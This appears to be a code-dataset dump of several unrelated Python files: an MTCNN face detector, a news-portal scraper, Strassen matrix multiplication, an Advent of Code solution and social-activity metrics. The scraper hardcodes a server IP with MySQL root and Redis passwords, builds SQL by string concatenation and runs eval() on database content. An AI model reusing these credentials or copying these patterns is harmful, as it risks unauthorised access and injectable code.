new_arr[k]=Resize((48,48))(crop_img).transpose([2,0,1])/255.0\n# # else:\n# # print(box)\n#\n# new_arr=to_tensor(new_arr)\n# o_out1, o_out2,o_out3 = self.onet(new_arr)\n# probs = o_out1\n# keep = probs[:, 0] > self.detection_threshold[2]\n# o_out1 = o_out1[keep]\n# boxes = boxes[keep]\n# if len(boxes)==0:\n# return boxes\n# boxes[:, 4] = o_out1[:, 0]\n# o_out2 = o_out2[keep]\n# o_out3=o_out3[keep]\n# boxes = calibrate_box(boxes, o_out2)\n#\n# landmarks_x = boxes[:, 0:1] + o_out3[:, 0::2] * (boxes[:, 2:3] - boxes[:, 0:1]+1)\n# landmarks_y = boxes[:, 1:2] + o_out3[:, 1::2] * (boxes[:, 3:4] - boxes[:, 1:2]+1)\n#\n# boxes=torch.cat([boxes,landmarks_x,landmarks_y],dim=-1)\n#\n#\n# #######################################\n# #########onet finish\n# #######################################\n# boxes = self.boxes_nms(boxes, overlap_threshold=self.detection_threshold[2])\n# if self.verbose:\n# print('onet:{0} boxes '.format(len(boxes)))\n# return to_numpy(boxes)\n# else:\n# return None\n# #idx=int(np.argmax(result,-1)[0])\n#\n# else:\n# raise ValueError('the model is not built yet.')\n# def generate_bboxes(self,*outputs,threshold=0.5,scale=1):\n# raise NotImplementedError\n# def nms(self,bboxes):\n# raise NotImplementedError\n#\n\n\nclass mtcnn(ModuleList):\n def __init__(self, pretrained=True, name='mtcnn'):\n super().__init__(name)\n self.nms_threshold = [0.9, 0.9, 0.3]\n self.detection_threshold = [0.5, 0.6, 0.9]\n self.min_size=10\n\n self.add_module('pnet',Pnet(pretrained=pretrained).model)\n self.add_module('rnet', Rnet(pretrained=pretrained).model)\n self.add_module('onet', Onet(pretrained=pretrained).model)\n self.add_module('pnet_detector', DetectorHead(cellsize=12, threshold=0.5, min_size=self.min_size))\n\n\n #adjust bbox like square\n def rerec(self,bboxA,img_shape):\n \"\"\"Convert bboxA to square.\"\"\"\n bboxA=to_numpy(bboxA)\n h = bboxA[:, 3] - bboxA[:, 1]\n w = bboxA[:, 2] - bboxA[:, 0]\n max_len = np.maximum(w, h)\n\n\n bboxA[:, 0] = bboxA[:, 0] -0.5*(max_len-w)\n bboxA[:, 1] = bboxA[:, 1] -0.5*(max_len-h)\n bboxA[:, 2] = bboxA[:, 0]+max_len\n bboxA[:, 3] =bboxA[:, 1]+max_len\n return to_tensor(bboxA)\n def forward(self, x, scale):\n inp =x.exand_dims(0)\n boxes = self.pnet(inp)\n boxes_list=[]\n if boxes is not None and len(boxes) > 0:\n box = boxes[:, :4] / scale\n score = boxes[:, 4:]\n boxes = concate([box.round_(), score], axis=1)\n if len(boxes) > 0:\n boxes_list.append(boxes)\n\n #######################################\n #########pnet finish\n #######################################\n if len(boxes_list) > 0:\n boxes = to_tensor(concate(boxes_list, axis=0))\n\n # print('total {0} boxes in pnet in all scale '.format(len(boxes)))\n boxes = clip_boxes_to_image(boxes, (x.shape[0], x.shape[1]))\n boxes = nms(boxes, threshold=self.detection_threshold[0])\n print('pnet:{0} boxes '.format(len(boxes)))\n # print('total {0} boxes after nms '.format(len(boxes)))\n # score = to_numpy(boxes[:, 4]).reshape(-1)\n if boxes is not None:\n # prepare rnet input\n\n boxes = self.rerec(boxes, x.shape)\n new_arr = np.zeros((boxes.shape[0], 3, 24, 24))\n\n for k in range(boxes.shape[0]):\n box = boxes[k]\n crop_img = x.copy()[int(box[1]):int(box[3]), int(box[0]):int(box[2]), :]\n if crop_img.shape[0] > 0 and crop_img.shape[1] > 0:\n new_arr[k] = Resize((24, 24))(crop_img / 255.0).transpose([2, 0, 1])\n # else:\n # print(box)\n new_arr = to_tensor(new_arr)\n r_output1_list = []\n r_output2_list = []\n r_output3_list = []\n if len(new_arr) > 16:\n for i in range(len(new_arr) // 16 + 1):\n if i * 16 < len(new_arr):\n r_out1, r_out2, r_out3 = self.rnet(new_arr[i * 16:(i + 1) * 16, :, :, :])\n r_output1_list.append(r_out1)\n r_output2_list.append(r_out2)\n r_output3_list.append(r_out3)\n r_out1 = concate(r_output1_list, axis=0)\n r_out2 = concate(r_output2_list, axis=0)\n r_out3 = concate(r_output3_list, axis=0)\n else:\n r_out1, r_out2, r_out3 = self.rnet(new_arr)\n\n probs = to_numpy(r_out1)\n keep = np.where(probs[:, 0] > self.detection_threshold[1])[0]\n r_out1 = r_out1[keep]\n boxes = boxes[keep]\n boxes[:, 4] = r_out1[:, 0]\n r_out2 = r_out2[keep]\n boxes = calibrate_box(boxes, r_out2)\n\n #######################################\n #########rnet finish\n #######################################\n\n boxes = nms(boxes, threshold=self.detection_threshold[1], image_size=(x.shape[0], x.shape[1]), min_size=self.min_size)\n print('rnet:{0} boxes '.format(len(boxes)))\n # print('total {0} boxes after nms '.format(len(boxes)))\n boxes = clip_boxes_to_image(boxes, (x.shape[0], x.shape[1]))\n boxes = self.rerec(boxes, x.shape)\n new_arr = np.zeros((boxes.shape[0], 3, 48, 48))\n\n for k in range(boxes.shape[0]):\n box = boxes[k]\n crop_img = x.copy()[int(box[1]):int(box[3]), int(box[0]):int(box[2]), :]\n if crop_img.shape[0] > 0 and crop_img.shape[1] > 0:\n new_arr[k] = Resize((48, 48))(crop_img / 255.0).transpose([2, 0, 1])\n # else:\n # print(box)\n\n new_arr = to_tensor(new_arr)\n o_out1, o_out2, o_out3 = self.onet(new_arr)\n probs = to_numpy(o_out1)\n keep = np.where(probs[:, 0] > self.detection_threshold[2])[0]\n o_out1 = o_out1[keep]\n boxes = boxes[keep]\n\n boxes[:, 4] = o_out1[:, 0]\n o_out2 = o_out2[keep]\n o_out3 = o_out3[keep]\n boxes = calibrate_box(boxes, o_out2)\n\n landmarks_x = boxes[:, 0:1] + o_out3[:, 0::2] * (boxes[:, 2:3] - boxes[:, 0:1] + 1)\n landmarks_y = boxes[:, 1:2] + o_out3[:, 1::2] * (boxes[:, 3:4] - boxes[:, 1:2] + 1)\n\n boxes = concate([boxes, landmarks_x, landmarks_y], axis=-1)\n #######################################\n #########onet finish\n #######################################\n\n\n\n\nclass Mtcnn(ImageDetectionModel):\n def __init__(self, pretrained=True, min_size=10, **kwargs):\n model=mtcnn(pretrained=pretrained)\n super(Mtcnn, self).__init__(input_shape=(3,12, 12), output=model)\n self.min_size = min_size\n self.signature=get_signature(self.model.forward)\n self.preprocess_flow =[normalize(0,255)]\n\n def get_image_pyrimid(self,img,min_size=None,factor= 0.709):\n if min_size is None:\n min_size=self.min_size\n min_face_area = (min_size, min_size)\n h = img.shape[0]\n w = img.shape[1]\n minl = np.amin([h, w])\n m = 12.0 / min_size\n minl = minl * m\n # create scale pyramid\n scales = []\n images = []\n factor_count = 0\n while minl >= 12:\n scales += [m * np.power(factor, factor_count)]\n scaled_img = rescale(scales[-1])(img.copy())\n if img is not None:\n for func in self.preprocess_flow:\n if inspect.isfunction(func):\n scaled_img=func(scaled_img)\n images.append(to_tensor(image_backend_adaption(scaled_img)))\n minl = minl * factor\n factor_count += 1\n return images, scales\n\n\n\n\n\n def infer_single_image(self,img,**kwargs):\n if self.model.built:\n self.model.to(self.device)\n self.model.eval()\n img=image2array(img)\n if img.shape[-1]==4:\n img=img[:,:,:3]\n imgs, scales = self.get_image_pyrimid(img)\n boxes_list = []\n for i in range(len(scales)):\n img=imgs[i]\n scale=scales[i]\n boxes=mtcnn(img,scale)\n boxes_list.append(boxes)\n boxes=concate(boxes_list,axis=0)\n #idx=int(np.argmax(result,-1)[0])\n boxes = nms(boxes, threshold=self.detection_threshold[2], image_size=(img.shape[0], img.shape[1]), min_size=self.min_size)\n print('onet:{0} boxes '.format(len(boxes)))\n return boxes\n else:\n return img\n\n def generate_bboxes(self,*outputs,threshold=0.5,scale=1):\n raise NotImplementedError\n def nms(self,bboxes):\n raise NotImplementedError\n\n\n\n","sub_path":"trident/models/pytorch_mtcnn.py","file_name":"pytorch_mtcnn.py","file_ext":"py","file_size_in_byte":29207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"137958116","text":"import hashlib\nimport json\nimport os\nimport pickle\nfrom datetime import date\nimport time\nfrom urllib.parse import urlparse, urljoin\nimport colorama\nimport requests\nimport sys\nimport mysql.connector\n\nfrom celery import Celery\nCeleryClient = Celery('task_celery', broker='redis://default:d474210009@167.86.120.98:6379/0')\n\napp = Celery('task_celery', broker='redis://default:d474210009@redis:6379/0')\nfrom bs4 import BeautifulSoup\nmydb = mysql.connector.connect(\n host=\"167.86.120.98\",\n port=\"3307\",\n database=\"test_portales\",\n user=\"root\",\n password=\"dalas.2009\"\n)\ndef configuracion(Id_Provincia):\n\n try:\n\n global db_noticias2\n db_noticias2 = {}\n\n if os.path.isfile('persist/db_noticias2'+Id_Provincia+'.bin'):\n db_noticias2 = load_persist(\"db_noticias2\"+Id_Provincia+\"\")\n else:\n db_noticias2 = {}\n except:\n db_noticias2 = {}\n\n\nmugre = [\"xmlns=http://www.w3.org/1999/>\", \"<\\n\", \"\\n>\", \"<

\", \"

\", \"\",\n \"xmlns=http://www.w3.org/1999/>\", \"
\", \"CDATA\", \">\", \"

\", \"
\", \"%>\", \"\", \"100%\", \"\", \"<\", \">\", \"'\", '\"', \"\\/\", \"]\", \"[\",\n \"/\",\"-\",\"ttp\",\":\",\"swww\"]\ndef limpiar(texto, mugre):\n for m in mugre:\n texto = texto.replace(m, \"\")\n return texto\ndef hashear(l):\n l = l.encode('utf-8')\n h = hashlib.new( \"sha1\",l)\n return h.hexdigest()\ndef save_persist(elem,id_provincia):\n try:\n vpath = \"./persist/\"\n\n varchivo = vpath + elem + id_provincia + \".bin\"\n with open(varchivo, \"bw\") as archivo:\n pickle.dump(eval(elem), archivo)\n except Exception as e:\n\n print(\"Except de save_persist\", e)\ndef load_persist(elem,id_provincia):\n try:\n vpath = \"./persist/\"\n varchivo = vpath + elem + id_provincia+\".bin\"\n with open(varchivo, \"br\") as archivo:\n # #print(pickle.load(archivo))\n return pickle.load(archivo)\n except Exception as e:\n print(\"269 - Except load_persit \", e)\ndef filtro_repetida(link,Id_Provincia):\n try:\n dd = link.replace(\"\\n\", \"\")[1:200]\n dd = limpiar(dd, mugre)\n dd = hashear(dd)\n r = False\n if dd in db_noticias2.keys():\n if (db_noticias2[dd] == 1):\n r = True\n else:\n r = False\n if not r:\n db_noticias2[dd] = 1\n print(\"\\n ********* \\n No encontrado: \\n\",dd,\"\\n\",link,\"\\n*************\")\n save_persist('db_noticias2',Id_Provincia)\n return r\n except Exception as e:\n print(\"329 - \", e)\ndef filtroReplace(object):\n object.replace(\"/\", \"\").replace(\":\", \"\").replace(\"%\", \"\").replace(\"-\", \"\").replace(\"[\", \"\").replace(\"]\",\"\").replace(\"<\",\"\").replace(\">\", \"\").replace(\"!\", \"\").replace(\",\", \"\")\n return \" \".join(object.split())\ndef contarElementosLista(lista):\n return {i: lista.count(i) for i in lista}\ndef is_valid(url):\n \"\"\"\n Checks whether `url` is a valid URL.\n \"\"\"\n parsed = urlparse(url)\n return bool(parsed.netloc) and bool(parsed.scheme)\ndef get_all_website_links(Portal,Noticiae):\n \"\"\"\n Returns all URLs that is found on `url` in which it belongs to the same website\n \"\"\"\n # all URLs of `url`\n urls = set()\n\n internal_urls = set()\n external_urls = set()\n # domain name of the URL without the protocol\n domain_name = urlparse(Portal).netloc\n #headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0', }\n #soup = BeautifulSoup(requests.get(url,headers=headers).content, \"html.parser\")\n for a_tag in Noticiae.findAll(\"a\"):\n href = a_tag.attrs.get(\"href\")\n if href == \"\" or href is None:\n # href empty tag\n continue\n # join the URL if it's relative (not absolute link)\n href = urljoin(Portal, href)\n parsed_href = urlparse(href)\n # remove URL GET parameters, URL fragments, etc.\n href = parsed_href.scheme + \"://\" + parsed_href.netloc + parsed_href.path\n if not is_valid(href):\n continue\n if href in internal_urls:\n continue\n if domain_name not in href:\n continue\n #print(f\"{GREEN}[*] Internal link: {href}{RESET}\")\n urls.add(href)\n internal_urls.add(href)\n return internal_urls\n\n\n\nif __name__ == \"__main__\":\n\n if len( sys.argv ) > 1:\n Id_Provincia = sys.argv[1]\n colorama.init()\n\n GREEN = colorama.Fore.GREEN\n GRAY = colorama.Fore.LIGHTBLACK_EX\n RESET = colorama.Fore.RESET\n\n Portales = requests.get(\"http://167.86.120.98:6060/Portales?id_provincia=\"+Id_Provincia+\"\").json()\n j = open(\"configGenerico2.json\", \"r\")\n\n confiTagPage = {}\n confiTagPage = json.loads(j.read())\n while True:\n\n for Portal in Portales:\n try:\n #Portal[\"url\"] = 'https://rosarionuestro.com/'\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',}\n response = requests.get(Portal[\"url\"], headers=headers).text\n try:\n mycursor = mydb.cursor()\n\n sql = \"SELECT tag FROM portales_tag where portales like \"+\"'%\"+ Portal[\"url\"]+\"%'\" + \"\"\n mycursor.execute(sql)\n sql = mycursor.fetchall()\n except Exception as e:\n print(\"Error al ejecutar la consulta\")\n for Noti in sql:\n try:\n\n Noticia = eval(Noti[0])\n if Noticia != []:\n for i, Noticiae in enumerate(Noticia):\n links = \"\"\n CantLinks = \"\"\n\n links = get_all_website_links(Portal[\"url\"], Noticiae)\n links = list(links)\n\n\n CantLinks = contarElementosLista(links)\n CantLinks = list(CantLinks)\n\n if len(CantLinks) < 4:\n for link in CantLinks:\n links = ''.join(links)\n\n timeinit = time.time()\n texto = filtroReplace(Noticiae.get_text())\n medio = Portal[\"url\"]\n fecha = date.today()\n\n try:\n mycursor = mydb.cursor()\n sql = \"INSERT INTO todas_las_noticias (link,fecha,titulo,copete,texto,medio,provincia) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s) \"\n val = (link, fecha, \"\", \"\", texto, medio, Id_Provincia)\n mycursor.execute(sql, val)\n mydb.commit()\n print(\"insertó correctamente el link: \" + link + \"\")\n except Exception as e:\n print(\"El Link ya fue guardado: \" + link + \"\")\n \"\"\"\n try:\n \n val = (link, fecha, \"\", \"\", texto, medio, int(Id_Provincia))\n CeleryClient.send_task(\"task_celery.InsertNoticiaMySql\", [{\"val\": val}])\n except Exception as e:\n print(\"El Link ya fue guardado: \" + link + \", \"+ str(e)+\"\")\n \"\"\"\n timefin = time.time() - timeinit\n print(timefin)\n except Exception as e:\n print(\"Error 3 - Obtener Articulos de noticias \", e)\n except Exception as e:\n print(\"Error 3 - Obtener Articulos de noticias \", e)\n\n","sub_path":"ScrapGenericoSonda3.py","file_name":"ScrapGenericoSonda3.py","file_ext":"py","file_size_in_byte":8274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"190381205","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom math import ceil, log\nimport time\nimport argparse\n\ndef read(filename1, filename2):\n lines1 = open(filename1, 'r').read().splitlines()\n lines1 = lines1[1:len(lines1)]\n\n lines2 = open(filename2, 'r').read().splitlines()\n lines2 = lines2[1:len(lines2)]\n\n A = []\n B = []\n matrix1 = A\n matrix2 = B\n for line in lines1:\n if line != \"\":\n matrix1.append(list(map(int, [x for x in line.split(\"\\t\") if x])))\n else:\n matrix1 = C\n\n for line in lines2:\n if line != \"\":\n matrix2.append(list(map(int, [x for x in line.split(\"\\t\") if x])))\n else:\n matrix2 = C\n\n return A, B\n\n\ndef add(A, B):\n n = len(A)\n C = [[0 for j in range(n)] for i in range(n)]\n for i in range(n):\n for j in range(n):\n C[i][j] = A[i][j] + B[i][j]\n return C\n\ndef subtract(A, B):\n n = len(A)\n C = [[0 for j in range(n)] for i in range(n)]\n for i in range(n):\n for j in range(n):\n C[i][j] = A[i][j] - B[i][j]\n return C\n\ndef strassen(A, B, seuil=2):\n \"\"\"\n Implementation of the strassen algorithm.\n \"\"\"\n n = len(A)\n newSize = n//2\n\n if n <= seuil:\n return conv(A, B)\n else:\n # initializing the new sub-matrices\n \n a11 = [[0 for j in range(newSize)] for i in range(newSize)]\n a12 = [[0 for j in range(newSize)] for i in range(newSize)]\n a21 = [[0 for j in range(newSize)] for i in range(newSize)]\n a22 = [[0 for j in range(newSize)] for i in range(newSize)]\n\n b11 = [[0 for j in range(newSize)] for i in range(newSize)]\n b12 = [[0 for j in range(newSize)] for i in range(newSize)]\n b21 = [[0 for j in range(newSize)] for i in range(newSize)]\n b22 = [[0 for j in range(newSize)] for i in range(newSize)]\n\n aResult = [[0 for j in range(newSize)] for i in range(newSize)]\n bResult = [[0 for j in range(newSize)] for i in range(newSize)]\n\n # dividing the matrices in 4 sub-matrices:\n for i in range(newSize):\n for j in range(newSize):\n a11[i][j] = A[i][j] # top left\n a12[i][j] = A[i][j + newSize] # top right\n a21[i][j] = A[i + newSize][j] # bottom left\n a22[i][j] = A[i + newSize][j + newSize] # bottom right\n\n b11[i][j] = B[i][j] # top left\n b12[i][j] = B[i][j + newSize] # top right\n b21[i][j] = B[i + newSize][j] # bottom left\n b22[i][j] = B[i + newSize][j + newSize] # bottom right\n\n # Calculating p1 to p7:\n aResult = add(a11, a22)\n bResult = add(b11, b22)\n p1 = strassen(aResult, bResult, seuil) # p1 = (a11+a22) * (b11+b22)\n\n aResult = add(a21, a22) # a21 + a22\n p2 = strassen(aResult, b11,seuil) # p2 = (a21+a22) * (b11)\n\n bResult = subtract(b12, b22) # b12 - b22\n p3 = strassen(a11, bResult, seuil) # p3 = (a11) * (b12 - b22)\n\n bResult = subtract(b21, b11) # b21 - b11\n p4 =strassen(a22, bResult, seuil) # p4 = (a22) * (b21 - b11)\n\n aResult = add(a11, a12) # a11 + a12\n p5 = strassen(aResult, b22, seuil) # p5 = (a11+a12) * (b22)\n\n aResult = subtract(a21, a11) # a21 - a11\n bResult = add(b11, b12) # b11 + b12\n p6 = strassen(aResult, bResult, seuil) # p6 = (a21-a11) * (b11+b12)\n\n aResult = subtract(a12, a22) # a12 - a22\n bResult = add(b21, b22) # b21 + b22\n p7 = strassen(aResult, bResult, seuil) # p7 = (a12-a22) * (b21+b22)\n\n # calculating c21, c21, c11 e c22:\n c12 = add(p3, p5) # c12 = p3 + p5\n c21 = add(p2, p4) # c21 = p2 + p4\n\n aResult = add(p1, p4) # p1 + p4\n bResult = add(aResult, p7) # p1 + p4 + p7\n c11 = subtract(bResult, p5) # c11 = p1 + p4 - p5 + p7\n\n aResult = add(p1, p3) # p1 + p3\n bResult = add(aResult, p6) # p1 + p3 + p6\n c22 = subtract(bResult, p2) # c22 = p1 + p3 - p2 + p6\n\n # Grouping the results obtained in a single matrix:\n C = [[0 for j in range(n)] for i in range(n)]\n for i in range(newSize):\n for j in range(newSize):\n C[i][j] = c11[i][j]\n C[i][j + newSize] = c12[i][j]\n C[i + newSize][j] = c21[i][j]\n C[i + newSize][j + newSize] = c22[i][j]\n return C\n\n\ndef conv(A, B):\n n = len (A)\n C = [[0 for i in range(n)] for j in range(n)]\n for j in range(n):\n for i in range(n):\n for k in range(n):\n C[j][i] += A[k][i]*B[j][k]\n return C\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # parser.add_option(\"-l\", dest=\"LEAF_SIZE\", default=\"8\",\n # help=\"when do you start using ikj\", metavar=\"LEAF_SIZE\")\n\n parser.add_argument(\"algo\")\n parser.add_argument(\"path1\")\n parser.add_argument(\"path2\")\n parser.add_argument(\"-p\", \"--print\", action = \"store_true\")\n parser.add_argument(\"-t\", \"--time\", action=\"store_true\")\n\n args = parser.parse_args()\n A, B = read(args.path1, args.path2)\n\n start = 0\n end = 0\n seuil = 32\n if args.algo == 'strassen':\n start = time.time()\n C = strassen(A, B)\n end = time.time()\n \n elif args.algo == 'strassenSeuil':\n \n start = time.time()\n C = strassen(A, B, seuil)\n end = time.time()\n\n elif args.algo == 'conv':\n start = time.time()\n C = conv(A, B)\n end = time.time()\n else:\n \tprint (\"argument de l'option -a invalides\")\n \n if args.time: \n resultat = end - start\n print(resultat)\n","sub_path":"source/teststrassen.py","file_name":"teststrassen.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"640024298","text":"from functools import lru_cache\n\n\nclass Graph:\n\n def __init__(self, ints) -> None:\n super().__init__()\n self.ints = ints\n self.precalc = {}\n\n def next_nodes(self, idx):\n return [i for i in range(idx + 1, min(idx + 4, len(self.ints))) if self.ints[i] - self.ints[idx] <= 3]\n\n def count_paths(self, idx, curr_paths):\n if idx == len(self.ints) - 1:\n return curr_paths + 1\n\n if idx in self.precalc:\n return self.precalc[idx]\n for next_node in self.next_nodes(idx):\n self.precalc[next_node] = self.count_paths(next_node, curr_paths)\n curr_paths += self.precalc[next_node]\n return curr_paths\n\n\n@lru_cache(None)\ndef arrangements(jolts, prev) -> int:\n \"\"\"The number of arrangements that go from prev to the end of `jolts`.\"\"\"\n first, rest = jolts[0], jolts[1:]\n if first - prev > 3:\n return 0\n elif not rest:\n return 1\n else:\n return (arrangements(rest, first) + # Use first\n arrangements(rest, prev)) # Skip first\n\n\ndef do_it(filename):\n with open(filename) as f:\n ints = sorted(list(map(int, f)))\n # ints = [0] + ints + [max(ints) + 3]\n return arrangements(tuple(ints), 0)\n\n\nif __name__ == '__main__':\n output = do_it('input1.txt')\n print(f'Result: {output}')\n\n# Result: 10578455953408\n","sub_path":"2020/10/102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458790632","text":"import pandas as pd\nimport pickle as pkl\nimport numpy as np\n\nfrom .measurements import MeasurementsBaseClass\nfrom .validators import check_empty\nfrom .validators import check_root_only\n\n\"\"\"\nNotes:\n - If no metadata then run community measurements as if there is a single \n community containing every node.\n\"\"\"\n\nclass SocialActivityMeasurements(MeasurementsBaseClass):\n def __init__(self, dataset, configuration, metadata, platform,\n content_node_ids=[], user_node_ids=[]):\n \"\"\"\n Description:\n\n Input:\n :dataset:\n :configuration:\n :metadata:\n\n Output:\n None\n \"\"\"\n super().__init__(dataset, configuration)\n\n self.measurement_type = 'social_activity'\n self.platform = platform\n\n\n self.contribution_events = [\n 'PullRequestEvent',\n 'PushEvent',\n 'IssuesEvent',\n 'IssueCommentEvent',\n 'PullRequestReviewCommentEvent',\n 'CommitCommentEvent',\n 'CreateEvent',\n 'post',\n 'tweet'\n ]\n\n self.popularity_events = [\n 'WatchEvent',\n 'ForkEvent',\n 'comment',\n 'post',\n 'retweet',\n 'quote',\n 'reply'\n ]\n\n self.main_df = self.preprocess(dataset)\n\n # store action and merged columns in a seperate data frame that is not \n # used for most measurements\n if platform=='github' and len(self.main_df.columns)==6 and 'action' in self.main_df.columns:\n self.main_df_opt = self.main_df.copy()[['action', 'merged']]\n self.main_df = self.main_df.drop(['action', 'merged'], axis=1)\n else:\n self.main_df_opt = None\n\n # For content centric\n if content_node_ids=='all':\n self.selectedContent = self.main_df\n else:\n if self.platform in ['reddit', 'twitter']:\n self.selectedContent = self.main_df[self.main_df.root.isin(content_node_ids)]\n elif self.platform=='github':\n self.selectedContent = self.main_df[self.main_df.content.isin(content_node_ids)]\n\n # For userCentric\n self.selectedUsers = self.main_df[self.main_df.user.isin(user_node_ids)]\n\n if metadata is not None:\n if metadata.use_content_data:\n self.useContentMetaData = True\n self.contentMetaData = metadata.content_data\n else:\n self.useContentMetaData = False\n\n if metadata.use_user_data:\n self.useUserMetaData = True\n self.UserMetaData = metadata.user_data\n else:\n self.useUserMetaData = False\n\n else:\n self.useContentMetaData = False\n self.useUserMetaData = False\n\n # For community measurements\n # Load and preprocess metadata\n if self.useUserMetaData and self.useContentMetaData:\n self.comDic = metadata.build_communities(self.contentMetaData,\n self.UserMetaData)\n else:\n self.comDic = {}\n\n if self.platform=='github':\n self.communityDF = self.getCommmunityDF('community')\n elif self.platform=='reddit':\n self.communityDF = self.getCommmunityDF('subreddit')\n elif self.platform=='twitter':\n self.communityDF = self.getCommmunityDF('')\n\n\n def preprocess(self, dataset):\n \"\"\"\n Description:\n\n Input:\n\n Output:\n Edit columns, convert date, sort by date\n \"\"\"\n events = self.popularity_events+self.contribution_events\n mapping = {'actionType' : 'event',\n 'nodeID' : 'content',\n 'nodeTime' : 'time',\n 'nodeUserID' : 'user'}\n\n if self.platform=='reddit':\n mapping.update({'communityID' : 'subreddit',\n 'keywords' : 'keywords',\n 'parentID' : 'parent',\n 'rootID' : 'root'})\n elif self.platform=='twitter':\n mapping.update({'parentID' : 'parent',\n 'rootID' : 'root'})\n elif self.platform=='github':\n mapping.update({'actionSubType' : 'action',\n 'status' : 'merged'})\n\n dataset = dataset.rename(index=str, columns=mapping)\n dataset = dataset[dataset.event.isin(events)]\n dataset = dataset.sort_values(by='time')\n dataset = dataset.assign(time=dataset.time.dt.floor('h'))\n\n return dataset\n\n\n def readPickleFile(self, filepath):\n with open(filepath, 'rb') as f:\n pickle_object = pkl.load(f)\n return pickle_object\n\n\n def getCommmunityDF(self, community_col):\n if community_col in self.main_df.columns:\n return self.main_df.copy()\n\n elif community_col!='':\n dfs = []\n\n content_community_types = ['topic','language']\n user_community_types = ['city','country','company','locations']\n\n #content-focused communities\n for community in content_community_types:\n if community in self.comDic.keys():\n for key in self.comDic[community]:\n d = self.main_df[self.main_df['content'].isin(self.comDic[community][key])]\n d[community_col] = key\n dfs.append(d)\n\n #user-focused communities\n for community in user_community_types:\n if community in self.comDic.keys():\n for key in self.comDic[community]:\n d = self.main_df[self.main_df['user'].isin(self.comDic[community][key])]\n d[community_col] = key\n dfs.append(d)\n\n if len(dfs)==0:\n result = self.main_df.copy()\n result['community'] = 'all'\n else:\n result = pd.concat(dfs)\n\n return result\n\n\n def getCommunityMeasurementDict(self, dataset):\n measurements = {}\n if isinstance(dataset, pd.DataFrame):\n for community in dataset['community'].unique():\n measurements[community]=dataset[dataset.community==community]\n del measurements[community]['community']\n elif isinstance(dataset, pd.Series):\n series_output = False\n for community in dataset.index:\n measurements[community] = dataset[community]\n try:\n len(dataset[community])\n series_output = True\n except:\n pass\n\n if series_output:\n for community in measurements:\n measurements[community] = pd.Series(measurements[community])\n\n return measurements\n\n\n def getProportion(self, eventTypes=None, community_field=\"subreddit\"):\n \"\"\"\n Calculates the proportion of each event type in the data.\n Question #7\n Inputs: df - Events data frame\n communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n eventTypes - List of event types to include\n Output: Dictionary of data frames with columns for event type and proportion, with one data frame for each community\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n p = df[['user','event',community_field]].groupby([community_field,'event']).count()\n p = p.reset_index()\n p.columns = ['community','event', 'value']\n\n community_totals = p[['community','value']].groupby('community').sum().reset_index()\n community_totals.columns = ['community','total']\n p = p.merge(community_totals, on='community',how='left')\n\n p['value'] = p['value']/p['total']\n del p['total']\n\n measurement = self.getCommunityMeasurementDict(p)\n\n return measurement\n\n\n def contributingUsers(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n This method calculates the proportion of users with events in teh data who are active contributors.\n Question #20\n Inputs: df - Events data\n Output: Proportion of all users who make active contributions\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if not eventTypes is None:\n df = df[df.event.isin(eventTypes)]\n\n #total number of unique users\n totalUsers = df.groupby(community_field)['user'].nunique()\n totalUsers.name = 'total_users'\n\n df = df[df['event'].isin(self.contribution_events)]\n\n #number of unique users with direct contributions\n contribUsers = df.groupby(community_field)['user'].nunique()\n contribUsers.name = 'contributing_users'\n\n df = pd.concat([totalUsers, contribUsers], axis=1).fillna(0)\n\n df['value'] = df['contributing_users']/ df['total_users']\n\n measurement = self.getCommunityMeasurementDict(df['value'])\n\n return measurement\n\n\n def getNumUserActions(self,unit='h',eventTypes=None,community_field='subreddit'):\n \"\"\"\n Calculate the average temporal user contribution counts within the data set.\n Question #23\n Inputs: df - Events data frame\n unit - Time granularity for time series calculation\n eventTypes - List of event types to include\n Output: Data frame containing a time series of average event counts\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if eventTypes != None:\n df = df[df.event.isin(eventTypes)]\n\n df['value'] = [0 for i in range(len(df))]\n df = df.set_index('time')\n\n #get event counts for each user within each time unit\n df = df[['user','value',community_field]].groupby([ pd.TimeGrouper(unit), 'user', community_field]).count()\n df = df.reset_index()\n\n #average the event counts across all users to get a single time series for the community\n df = df[['time','value',community_field]].groupby(['time',community_field]).mean().reset_index()\n df['value'] = pd.to_numeric(df['value'])\n df.columns = ['time','community','value']\n\n measurement = self.getCommunityMeasurementDict(df)\n\n return measurement\n\n\n def burstsInCommunityEvents(self,eventTypes=None,community_field=\"subreddit\"):\n \"\"\"\n Calculates the burstiness of inter-event times within the data set.\n Question #9\n Inputs: communities - Boolean to calculate the measurement seperately for each community (True) or for the full data set (False)\n eventTypes - List of event types to include in the data\n Output: Burstiness value (scalar)\n \"\"\"\n df = self.communityDF.copy()\n\n if len(df) == 0:\n return None\n\n if eventTypes != None:\n df = df[df['event'].isin(eventTypes)]\n\n if len(df) == 0:\n return None\n\n def burstiness(grp):\n\n #get interevent times\n grp['diff'] = grp['time'].diff()\n grp['diff'] = grp['diff'] / np.timedelta64(1, 's')\n\n grp = grp[np.isfinite(grp['diff'])]\n\n mean = grp['diff'].mean()\n std = grp['diff'].std()\n if std + mean > 0:\n burstiness = (std - mean) / (std + mean)\n else:\n burstiness = 0\n\n return burstiness\n\n b = df.groupby(community_field).apply(burstiness)\n b.columns = ['community', 